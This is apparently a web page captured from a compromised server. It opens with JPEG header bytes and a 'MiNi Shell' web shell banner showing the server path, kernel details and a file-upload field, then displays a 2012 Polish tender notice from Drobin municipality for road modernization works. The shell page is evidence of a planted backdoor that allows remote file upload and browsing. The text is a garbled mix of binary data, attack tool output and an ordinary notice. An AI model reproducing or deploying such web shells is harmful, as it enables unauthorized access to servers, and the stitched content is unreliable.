JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120613/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120613/199284-N-2012.html

<p class="kh_header"><b>Drobin: Modernizacja  i  przebudowa  dróg w Gminach  regionu  płockiego  szansą  ich    dynamicznego   rozwoju .</b><br>
<b>Numer ogłoszenia: 199284 - 2012; data zamieszczenia: 13.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta i Gminy Drobin , ul. Piłsudskiego 12, 09-210 Drobin, woj. mazowieckie, tel. 024 2601441 w. 107.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja  i  przebudowa  dróg w Gminach  regionu  płockiego  szansą  ich    dynamicznego   rozwoju ..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest wykonanie zadania 
 Modernizacja  i  przebudowa  dróg w Gminach  regionu  płockiego  szansą  ich  dynamicznego   rozwoju 
      w tym 
     Przebudowa drogi gminnej  relacji Drobin - Dobrosielice - Kowalewo na odcinku od km 1+00.00  do km 5+046  II warstwa ścieralna  

  Przebudowa drogi gminnej Nr 290535W Cieszewo - Maliszewko   II warstwa ścieralna 
 
     Przebudowa drogi gminnej Stanisławowo - Cieszewko od  km 0+000 do km 1+200  II warstwa ścieralna 

     Przebudowa drogi gminnej  relacji Nagórki Dobrskie - Maliszewko Maliszewko  na odcinku od km 0+000 do km  5+730 oraz od km 6+700 do km 7+586,03  II warstwa ścieralna 

     Przebudowa drogi powiatowej relacji Nagórki Dobrskie - Maliszewko  od km 5+730 do km 6+700- Droga powiatowa przez Setropie .


1.Przebudowa drogi gminnej  relacji Drobin - Dobrosielice - Kowalewo na odcinku od km 1+00.00 do km 5+046  II warstwa ścieralna 
Przedmiot  zamówienia obejmuje  
- roboty pomiarowe przy liniowych robotach ziemnych -  - 4,05 km
-  mechaniczne oczyszczanie nawierzchni drogowych ulepszonych z bitumu  -  20230,00 m2 
-skropienie nawierzchni drogowych asfaltem  -  20230,00 m2
- nawierzchnie z mieszanek mineralno - asfaltowych, warstwa wyrównawcza grubości warstwy po zagęszczeniu 1 cm . 20230,00 m2
-nawierzchnia z mieszanek mineralno - asfaltowych , warstwa ścieralna grubości po zagęszczeniu 3 cm - 20230,00 m2
-pobocza z kruszywa naturalnego, grubość warstwy po zagęszczeniu 4 cm , krotność 0,5-  6069,00 m2 
- czyszczenie rowów z wyprofilowaniem dna skrp , grubość namułu 10 cm  -  4586,00  m
-plantowanie powierzchni skarp i dna wykopów wykonywanych mechanicznie  -  6879,00 m2

 Szczegółowo przedmiot zamówienia określa 
 Załącznik Nr 1 do SIWZ 
 a. projekt przebudowy drogi powiatowej nr 2993 oraz drogi gminnej  relacji Drobin - Dobrosielice  - Kowalewo gmina Drobin ,
 b. ogólne specyfikacje techniczne  , 
 c. przedmiar robót .
  
 
2.Przebudowa drogi gminnej  Nr 290535W Cieszewo - Maliszewko  II warstwa ścieralna 
   Droga gminna wykazana w dokumentacji pod nr. 35 obecnie stanowi drogę gminą o nr. 290535W   
Przedmiotem zamówienia obejmuje : 
  - roboty pomiarowe przy liniowych robotach ziemnych -  1,38  km
- mechaniczne oczyszczanie nawierzchni drogowych ulepszonych z bitumu -  7280,40 m2 
-skropienie nawierzchni drogowych asfaltem  -  7280,40 m2
-nawierzchnie z mieszanek mineralno - asfaltowych, warstwa ścieralna grub. warstwy po zagęszczeniu 5 cm  -  7280,40 m2
- pobocza z kruszywa naturalnego, grubość warstwy po zagęszczeniu 5cm  -  2089,75 m2 
-czyszczenie rowów z wyprofilowaniem dna skarpy, grubość namułu 10 cm  -  1740,00  m
-plantowanie powierzchni skarp i dna wykopów wykonywanych mechanicznie   -  3174,10 m2
-plantowanie powierzchni skarp i korony nasypów - 2857,10 m2
Szczegółowo przedmiot zamówienia określa 
Załącznik Nr 2 do SIWZ 
a.  projekt budowlany wykonawczy przebudowy drogi gminnej Cieszewo - Maliszewko 
b. projekt stałej organizacji ruchu
c. szczegółowe specyfikacje techniczne dla przebudowy drogi gminnej Cieszewo - Maliszewko 
d.  przedmiar robót

 
3.Przebudowa  drogi gminnej Stanisławowo - Cieszewko od  km 0+000 do km 1+200   II warstwa ścieralna 
   Przedmiotem zamówienia obejmuje 
   - roboty pomiarowe przy liniowych robotach ziemnych  -  0,90  km
  - mechaniczne oczyszczanie nawierzchni drogowych ulepszonych z bitumu -  3150,00 m2 
  - skropienie nawierzchni drogowych asfaltem  -   3150,00 m2
  - nawierzchnie z mieszanek mineralno - asfaltowych, warstwa ścieralna grub. warstwy po zagęszczeniu 4 cm  -  3150,00 m2
  - pobocza z kruszywa naturalnego, grubość warstwy po zagęszczeniu 4cm  -  1350,00 m2 
  -plantowanie powierzchni skarp i korony nasypów    -  1800,00 m2
 
Szczegółowo przedmiot zamówienia określa 
 Załącznik Nr 3 do SIWZ              
a.projekt  budowlany modernizacji drogi gminnej Stanisławowo - Cieszewko , klasy L od km 0+000 do km 1 + 200 . Część I. Materiały opisowe
b.projekt  budowlany modernizacji drogi gminnej Stanisławowo - Cieszewko , klasy  L od km 0+000 do km 1 + 200 . Część II. Materiały rysunkowe
c.projekt  budowlany modernizacji drogi gminnej Stanisławowo - Cieszewko , klasy L od km 0+000 do km 1 + 200 . Część III. Projekt oznakowania  projekt organizacji  ruchu 
    d.  Specyfikacja techniczna    wykonania i odbioru robót  -   Projekt budowlany modernizacji drogi gminnej Stanisławowo - Cieszewko , klasy L od km  0+000 do km 1 + 200 . Część V. Specyfikacje techniczne 
   e. przedmiar robót 


4. Przebudowa drogi gminnej  Nagórki Dobrskie - Maliszewko  na odcinku od km0+000 do  5+730 oraz od km 6+700 do km 7+586,03   II warstwa ścieralna 
       Przedmiotem zamówienia obejmuje  
  - roboty pomiarowe przy liniowych robotach ziemnych -  6,62  km
- mechaniczne oczyszczanie nawierzchni drogowych ulepszonych z bitumu -  30965,19 m2 
-  skropienie nawierzchni drogowych asfaltem  -   30965,19 m2
-nawierzchnie z mieszanek mineralno - asfaltowych, warstwa ścieralna grub. warstwy po zagęszczeniu 4 cm  -  30965,19m2
-  pobocza z kruszywa naturalnego, grubość warstwy po zagęszczeniu 4cm  -  9919,54 m2 
- czyszczenie rowów z wyprofilowaniem dna skarp, grubości namułu 10 cm  - 13226,06 m
-  plantowanie powierzchni skarp i dna wykopów wykonywanych mechanicznie     -  10283,50  m2 ,
-  plantowanie powierzchni skarp i korony nasypów  - 17989,40 m2 

5. Przebudowa drogi powiatowej relacji  Nagórki Dobrskie - Maliszewko od km 5+730 do km 6+700 - Droga powiatowa przez Setropie  
        Przedmiotem zamówienia obejmuje  
-roboty pomiarowe przy liniowych robotach ziemnych  -  0,97   km
- usuwanie warstwy ziemi urodzajnej ( humusu) za pomocą spycharek, grubość warstwy do 15 cm   -  2128,00 m2 ,
- mechaniczne karczowanie krzaków i podszycia średnich 31-60% - 0,08 ha 
- mechaniczne ścinanie drzew i karczowanie pni , średnica  drzew 20-30 cm  - 7 szt
- wywożenie dłużyc na odległości do 2 km  - m-p 2,52
- wywożenie karpiny na odległość do 2 km  -  m-p 3,50
- wywożenie gałęzi na odległość do 2 km  -  m-p 3,50
- roboty ziemne wykonywane koparkami przedsiębiernymi z transportem urobku  -  1015,00 m 3
- przemieszczanie spycharkami mas ziemnych uprzednio odspojonych - 331,00 m3
- roboty ziemne wykonywane koparkami przedsiębiernymi w ziemi zmagazynowanej na hałdach z transportem  - 437,00 m m 3
- formowanie , zagęszczanie nasypów spycharkami  - 246,00 m3
- odtworzenie rowów z wyprofilowaniem dna skarp  - 1940,00 m
- układanie rur ochronnych z PCW w wykopie dla przewodów telekomunikacyjnych  - 9,00 m 
- profilowanie i zagęszczanie podłoża pod warstwy konstrukcyjne nawierzchni  -  5895,54 m2 
- dolna warstwa podbudowy z kruszywa naturalnego ,grubość warstwy po zagęszczeniu 20 cm -5895,54 m2
- czyszczenie przepustów  o średnicy 0,8 m  - 10,00 m
-wykopy oraz przekopy wykonywane koparkami przedsiębiernymi  - 30,00 m3 
- przepusty rurowe pod koroną drogi , ławy fundamentowe betonowe  -  0,60 m3
- przepusty rurowe pod koroną drogi ,ścianki czołowe dla rur o średnicy 80 cm -  2,00 szt
- przepusty rurowe pod koroną drogi, rury betonowe o średnicy 80 cm  - 8,00 m
- zasypywanie wykopów fundamentowych podłużnych  -  90,00 m3
-darniowanie przepustów na wlotach  -  40,00 m2
- przepusty rurowe pod zjazdami , ławy fundamentowe betonowe  -  5,70 m3
-przepusty rurowe pod zjazdami , rury betonowe o średnicy 60 cm  -  76,00 m
- przepusty rurowe pod zjazdami , ścianki czołowe dla rur o średnicy 60 cm  - 18,00 szt
- nawierzchnia na zjazdach z kruszywa naturalnego grubości warstwy po zagęszczeniu 15 cm  -  86,84 m2
- pobocza z kruszywa naturalnego , grubość warstwy po zagęszczeniu 8 cm  - 1455,00 m2
- skropienie nawierzchni drogowych asfaltem  -  5557,74 m2
-nawierzchnia z mieszanek mineralno - asfaltowych , warstwa wiążąca , grubość warstwy po zagęszczeniu 9 cm , transport mieszanki samochodem  - 5557,74 m2
- skropienie nawierzchni drogowych asfaltem  - 5373,00 m2 , 
-nawierzchnie z mieszanek mineralno - asfaltowych ,warstwa ścieralna grub. warstwy po zagęszczeniu 5 cm , transport mieszanki samochodem  - 5373,00 m2
- plantowanie powierzchni skarp i dna wykopów wykonywanych mechanicznie  -  3933,10 m2
- plantowanie powierzchni skarp korony nasypów  - 1549,70 m2
- pionowe znaki drogowe , słupki z rur stalowych o średnicy 50 mm  - 7,00 szt
- pionowe znaki drogowe , znaki zakazu , nakazu, ostrzegawcze i informacyjne o powierzchni do 0,3 m2  - 11,00 - szt.
     Szczegółowo przedmiot zamówienia dla przebudowy  drogi gminnej  Nagórki Dobrskie - Maliszewko  na odcinku od km 5+730 oraz od km 6+700 do km 7+586,03   II warstwa ścieralna  i  przebudowy drogi powiatowej relacji  Nagórki Dobrskie - Maliszewko od km 5+730 do km 6+700  , określa 
 Załącznik Nr 4 do SIWZ 
 a. projekt budowlany   branża drogowa -  Przebudowa drogi gminnej i powiatowej relacji Nagórki Dobrskie - Maliszewko od km 0+000,00 do 7 + 586,03 .
 b. projekt stałej organizacji ruchu  -  Przebudowa drogi gminnej i powiatowej relacji Nagórki Dobrskie - Maliszewko od km 0+000,00 do 7 + 586,03  .
 c. operat wodnoprawny zadanie inwestycyjne pn.  Przebudowa drogi gminnej i powiatowej relacji Nagórki Dobrskie - Maliszewko od km 0+000,00 do 7 + 586,03 .
 d . specyfikacja techniczna a wykonania i odbioru robót . Przebudowa dróg gminnych relacji Nagórki  Dobrskie - Maliszewko , Gmina Drobin od km 0+000 do 7+586,03 
 e. przedmiar  robót
     1. Przebudowa drogi gminnej relacji Nagórki Dobrskie - Maliszewko 
     2. Przebudowa drogi powiatowej relacji Nagórki Dobrskie - Maliszewko 


6. Wykonanie i montaż tablic pamiątkowych .
     Tablica pamiątkowa o wymiarach 2000mm szerokość x 1500mm wysokość z blachy   stalowej ocynkowanej o grubości 1,25 mm z podwójnie zaginanymi krawędziami, tylna strona malowana proszkowo, lico tablicy wykonane z folii odblaskowej typ 1. Tło tablic białe. - w ilości 8 sztuk.
Lokalizacje: 
1.	droga relacji Drobin - Dobrosielice - Kowalewo - 2 sztuki 
2 	droga Cieszewo - Maliszewko - 2 sztuki
3.	droga Stanisławowo - Cieszewko  - 2 sztuki
4.	droga Nagórki Dobrskie - Maliszewko - 2 sztuki.
Zgodnie z Wytycznymi tablice należy zamontować na początku i na końcu budowanego odcinka drogi. Zamówienie dotyczy demontażu istniejących tablic informacyjnych             i zamontowaniu tablic pamiątkowych na istniejących konstrukcjach    wsporczych. 
Grafika tablic wykonana zgodnie z Wytycznymi dla beneficjentów w zakresie działań informacyjno-promocyjnych w ramach Regionalnego Programu Operacyjnego Województwa Mazowieckiego 2007-2013.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7, 45.10.00.00-8, 45.23.32.00-1, 45.40.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości 80  000  zł słownie  osiemdziesiąt  tysięcy złotych.

2.	Wykonawca może wnieść wadium jednej lub kilku formach przewidzianych w art. 45 ust. 6 ustawy Pzp, tj. pieniądzu, poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości Dz. U. z 2007r. Nr 42, poz. 275 ze zm.

3.	Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.

4.	Wadium w pieniądzu należy wnieść przelewem  na konto Zamawiającego
Bank BS  MAZOWSZE  O Drobin   Nr 85 9042 1068 0420 0358 2000 0050

5.	W przypadku wadium wnoszonego w pieniądzu, jako termin wniesienia wadium przyjęty zostaje termin uznania kwoty na rachunku Zamawiającego.

6.	W przypadku wniesienia wadium w formie innej niż pieniądz - oryginał dokumentu potwierdzającego wniesienie wadium należy złożyć przed upływem terminu składania ofert w siedzibie Zamawiającego Urząd Miasta i Gminy Drobin  w kancelarii pok. 115 na pierwszym piętrze  , a kserokopię dokumentu poświadczoną za zgodność z oryginałem należy załączyć do oferty.

7.	Niewniesienie wadium w terminie lub w sposób określony w SIWZ spowoduje wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt 2 ustawy Pzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zgodnie z zasadami sztuki budowlanej wykonali i prawidłowo ukończyli co najmniej jedną robotę budowlaną z zakresu budowy dróg , o wartości, nie mniejszej  niż 2 000 000  zł. brutto. Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postepowaniu metodą warunku granicznego - spełnia / niepsełnia .</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują osobami, które będą wykonywać zamówienie lub pisemnym zobowiązaniem innych podmiotów do udostępnienia tych osób,  w tym przynajmniej 1 osobą posiadającą uprawnienia do kierowania robotami budowlanymi  drogowymi .
         - wykazanie  dysponowania osobami zdolnymi   do wykonania zamówienia , posiadającymi określone przepisami Prawa Budowlanego uprawnienia do kierowania robotami drogowymi   kierownik budowy  , - która będzie kierowała robotami i ma co najmniej trzyletnie doświadczenie w kierowaniu robotami budowlanymi w ww. specjalnościach . Warunek uznaje się za spełniony jeżeli Wykonawca przedstawi co najmniej jedną osobę posiadającą  wymienione uprawnienia lub kilka osób posiadających jedno lub kilka z wymienionych uprawnień, osoby te łącznie powinny dysponować wszystkimi wymaganymi w specyfikacji uprawnieniami Osoba pełniąca  funkcję kierownika musi być wpisana na listę Okręgowej Izby Inżynierów Budownictwa.
Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postepowaniu metodą warunku granicznego - spełnia / niepsełnia .</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Są ubezpieczeni od odpowiedzialności cywilnej w zakresie działalności związanej z przedmiotem zamówienia na kwotę, co najmniej 2 000 000.złotych (słownie dwa miliony  zł).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
